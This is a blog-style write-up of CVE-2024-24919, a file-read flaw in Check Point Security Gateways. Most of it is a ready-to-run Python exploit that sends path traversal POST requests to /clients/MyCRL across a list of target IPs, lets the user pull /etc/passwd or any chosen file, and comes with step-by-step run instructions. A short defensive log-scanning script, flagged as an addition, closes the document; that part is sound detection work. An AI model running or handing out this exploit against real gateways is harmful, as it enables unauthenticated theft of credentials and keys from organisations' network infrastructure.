Yupy Syntax

CVE-2024-24919 - Write Up


Haii!! How are you?!!

This time I will share a write-up of the findings from a website that is vulnerable to CVE-2024-24919. Okay, let's get straight to it.

Vulnerability Details:

This vulnerability allows an attacker to read certain information on internet-connected Check Point Security Gateways that have the Remote Access VPN feature or the Mobile Access Software Blades enabled. A security update for this vulnerability is available.

CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Severity: Critical (8.6)

Proof of Concept (PoC):

Exploit

CVE-2024-24919.py
import subprocess

# ANSI escape codes for coloring
BLUE = '\033[94m'
ORANGE = '\033[93m'
GREEN = '\033[92m'
RED = '\033[91m'
RESET = '\033[0m'


def check_vulnerability(ip, file_name="etc/passwd"):
    # Try different curl commands with various SSL options
    commands = [
        # Disable SSL verification
        f"curl -i -s -k -X POST \
        -H 'Host: {ip}' \
        -H 'Content-Length: 39' \
        --data-binary 'aCSHELL/../../../../../../../{file_name}' \
        'https://{ip}/clients/MyCRL'",
        # Specify SSL version (TLSv1.2)
        f"curl -i -s -k -X POST \
        -H 'Host: {ip}' \
        -H 'Content-Length: 39' \
        --data-binary 'aCSHELL/../../../../../../../{file_name}' \
        --tlsv1.2 \
        'https://{ip}/clients/MyCRL'"
    ]
    for command in commands:
        try:
            output = subprocess.check_output(command, shell=True, text=True)
            if any(word in output for word in ["root", "admin", "nobody"]):
                print(f"{GREEN}{ip} is vulnerable.{RESET}")
                return "vulnerable", output
        except subprocess.CalledProcessError:
            continue
    print(f"{RED}{ip} is not vulnerable.{RESET}")
    return "not-vulnerable", None


def main():
    try:
        with open('domain-IP.txt', 'r') as file:
            ips = file.readlines()
    except FileNotFoundError:
        print(f"{RED}Error: The file 'domain-IP.txt' was not found.{RESET}")
        return

    for ip in ips:
        ip = ip.strip()  # Remove any leading/trailing whitespace or newlines
        if ip:
            result, output = check_vulnerability(ip)
            if result == "vulnerable":
                # Ask if the user wants to print the response body data
                print_response = input(f"{BLUE}Do you want to print the response body data? (Yes/No):{RESET} ").strip().lower()
                if print_response == "yes":
                    print(f"{GREEN}{output}{RESET}")

                # Ask if the user wants to change the directory
                change_dir = input(f"{BLUE}Do you want to change the directory of the file? (Yes/No):{RESET} ").strip().lower()
                if change_dir == "yes":
                    new_file_name = input(f"{ORANGE}Please enter the new file name to replace 'etc/passwd':{RESET} ").strip()
                    # Call the function again with the new file name
                    result, output = check_vulnerability(ip, new_file_name)
                    if result == "vulnerable" and output:
                        print(f"With new file name '{new_file_name}':")
                        print(f"{GREEN}{output}{RESET}")


if __name__ == "__main__":
    main()

Run the Python script above as follows:

  1. Enter the target IP into the file domain-IP.txt
  2. Run python3 CVE-2024-24919.py

Impact:

This vulnerability could allow an unauthenticated, remote attacker to read local files on an affected Security Gateway, including sensitive files such as password data, SSH keys, or other credentials. Under certain conditions, this can lead to credential theft, lateral movement within the network, and potentially full system compromise. It has been observed that this vulnerability is already being exploited in the wild to extract Active Directory credentials.
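For the defender's side, here is an added example (not part of the original write-up or of the PoC script) that looks for the request shape shown above in access logs: a POST to /clients/MyCRL whose body carries a path traversal sequence. The log format, the sample lines and the assumption that the body (or its first bytes) is logged as the last quoted field are all constructed for this example; adapt the regex to whatever your proxy or gateway actually records.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines, not captured traffic. The format assumes
# the gateway, or a reverse proxy in front of it, logs the request line and the
# first bytes of the POST body as the last quoted field.
SAMPLE_LOG = """\
10.0.0.5 - - [29/May/2024:10:00:01 +0000] "POST /clients/MyCRL HTTP/1.1" 200 1450 "aCSHELL/../../../../../../../etc/passwd"
10.0.0.6 - - [29/May/2024:10:00:02 +0000] "GET /clients/MyCRL HTTP/1.1" 200 812 "-"
10.0.0.7 - - [29/May/2024:10:00:03 +0000] "POST /clients/MyCRL HTTP/1.1" 200 980 "aCSHELL/..%2F..%2F..%2Fetc/passwd"
10.0.0.8 - - [29/May/2024:10:00:04 +0000] "POST /clients/MyCRL HTTP/1.1" 200 120 "aCSHELL/crl.pem"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<body>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')


def normalize(s: str) -> str:
    """Percent-decode up to twice so an encoded or double-encoded '../' is still matched."""
    for _ in range(2):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_log(text: str) -> list:
    """Return (client_ip, status, decoded_body) for every POST to /clients/MyCRL whose
    body contains a traversal sequence after decoding. Unparseable lines are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if m['method'] != 'POST' or not m['path'].endswith('/clients/MyCRL'):
            continue
        body = normalize(m['body'])
        if TRAVERSAL_RE.search(body):
            hits.append((m['ip'], int(m['status']), body))
    return hits


if __name__ == '__main__':
    for ip, status, body in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} body={body!r}")
```

A 200 status on a flagged request is the case to triage first, since it indicates the gateway answered the traversal rather than rejecting it.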

References: